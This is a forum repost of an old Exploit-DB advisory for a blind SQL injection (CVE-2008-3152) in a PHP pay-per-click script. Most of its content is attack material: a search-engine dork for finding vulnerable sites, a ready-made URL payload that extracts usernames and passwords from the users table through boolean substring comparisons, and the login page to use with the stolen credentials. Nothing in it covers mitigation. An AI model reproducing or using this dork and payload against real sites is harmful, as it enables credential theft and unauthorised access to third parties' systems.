- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6014
- Проверка EDB
-
- Пройдено
- Автор
- HAMTARO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-3152
- Дата публикации
- 2008-07-07
Код:
+---------------------------------------+
| Blind SQL Injection Vulnerability |
| in Pay Per Click Script |
| found by Hamtaro aka CorVu5 |
|there must be 50 ways to learn to hover|
+---------------------------------------+
#gdork: "Pay Per Click Script powered by SmartPPC.com."
#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108
#login: site.com/accounts.php
---------------------------------------
greetz Hamtaro aka CorVu5
# milw0rm.com [2008-07-07]- Источник
- www.exploit-db.com
